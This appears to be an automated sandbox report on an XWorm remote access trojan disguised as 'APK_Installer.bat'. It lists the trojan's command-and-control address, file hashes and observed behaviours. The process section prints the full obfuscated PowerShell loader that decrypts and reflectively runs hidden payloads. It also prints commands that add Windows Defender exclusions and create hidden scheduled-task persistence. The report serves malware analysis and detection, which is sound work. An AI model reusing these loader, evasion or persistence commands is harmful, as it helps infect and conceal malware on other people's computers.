Resubmissions

30-05-2024 17:45

240530-wb2ltafc3z 10

30-05-2024 17:42

240530-wac7tsfb8v 10

Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30-05-2024 17:42

General

  • Target

    APK_Installer.bat

  • Size

    302KB

  • MD5

    7a5f5944302b8298714b56ae2f138b7c

  • SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

  • SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

  • SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • SSDEEP

    6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_211_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_211.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4552
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_211.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_211.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_211.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_211.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2072
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3448
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3324
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1212
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              PID:3352
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1940
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
              6⤵
                PID:1276
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1EF.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5036
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:2288

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      eb15ee5741b379245ca8549cb0d4ecf8

      SHA1

      3555273945abda3402674aea7a4bff65eb71a783

      SHA256

      b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

      SHA512

      1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      1a9fa92a4f2e2ec9e244d43a6a4f8fb9

      SHA1

      9910190edfaccece1dfcc1d92e357772f5dae8f7

      SHA256

      0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

      SHA512

      5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      9b700dd28cad30c7ed7a7e6fc6367002

      SHA1

      ef00fcc0d512758d428a5c0c73c34f0c01cefdeb

      SHA256

      8b8532ff0ed06dd5696cdf54fc5909757444e82f5739d8402e2534e813573ddd

      SHA512

      8bd5d5209fce602c1bb4eacf081744a5a5524cc05d48adf9e2343f49b7a1f9e510cc859d1796d84291ba0172059ca7bd32bfd1d0840310cafb18839257bd375a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      d8528086c51c4f1528a9676038ec213e

      SHA1

      bd32a682d9df21d36799486346aa1235c96b4d6a

      SHA256

      7cd0a49f94c512e57e0a7102352ee68c5d7a320db0eec57aea0d5e648d4bcf4a

      SHA512

      e89d008113f89b978fb65bd6dd0bcde3c4506fbb14e54aa5296607ae34d94081d1e825750dbd9dd864adea462c8dc1263e3d138c041b3d4b7dee78debdef7374

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fw0yjg4r.psj.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmp1EF.tmp.bat

      Filesize

      170B

      MD5

      c177a7409cb8dd0f1a2b16ee4f77cd48

      SHA1

      627611a449fd264ebd7e64c599d038354e6f738c

      SHA256

      079e83e42525b1adf9dee2c12a1fe62c14dc99cb74ceae640c0ecdc8eb13190b

      SHA512

      a4514c0070359ea76f6cc46aec13f57b5cfee1cb5ab9e4261a28c84a756085a407feb87deeda1e0ce43d341e38064115d159ca494e77678bbceb1d61e4c1ec66

    • C:\Users\Admin\AppData\Roaming\startup_str_211.bat

      Filesize

      302KB

      MD5

      7a5f5944302b8298714b56ae2f138b7c

      SHA1

      669b42f2f6e76895899d84d5ad7a12f23d951f13

      SHA256

      3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

      SHA512

      73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

    • C:\Users\Admin\AppData\Roaming\startup_str_211.vbs

      Filesize

      115B

      MD5

      91a5a534d4321ddb5206d899df290d34

      SHA1

      36298336b90b1bcfb811eea2c78eb5813f7699bb

      SHA256

      247b0003fab14a41c2c51e39dbddf4bce98548fdf98559b9657e914b7b38b197

      SHA512

      d3a925b589809e5c89f5490e767d6cc0b000c1f8e2218279890ad73c166a7f197ffbdfcc8b11699d74d2b5a8597f655b27560eda18f88f549ccade3fe7259ce2

    • memory/904-81-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/904-11-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/904-12-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/904-10-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/904-9-0x0000021BD8280000-0x0000021BD82A2000-memory.dmp

      Filesize

      136KB

    • memory/904-13-0x0000021BD8270000-0x0000021BD8278000-memory.dmp

      Filesize

      32KB

    • memory/904-82-0x00007FFD8CC33000-0x00007FFD8CC35000-memory.dmp

      Filesize

      8KB

    • memory/904-0-0x00007FFD8CC33000-0x00007FFD8CC35000-memory.dmp

      Filesize

      8KB

    • memory/904-14-0x0000021BD84F0000-0x0000021BD852A000-memory.dmp

      Filesize

      232KB

    • memory/2072-47-0x00000196A50E0000-0x00000196A50FA000-memory.dmp

      Filesize

      104KB

    • memory/2072-83-0x00000196A5450000-0x00000196A545C000-memory.dmp

      Filesize

      48KB

    • memory/2072-84-0x00000196A56B0000-0x00000196A5863000-memory.dmp

      Filesize

      1.7MB

    • memory/4552-26-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/4552-16-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/4552-17-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB

    • memory/4552-29-0x00007FFD8CC30000-0x00007FFD8D6F2000-memory.dmp

      Filesize

      10.8MB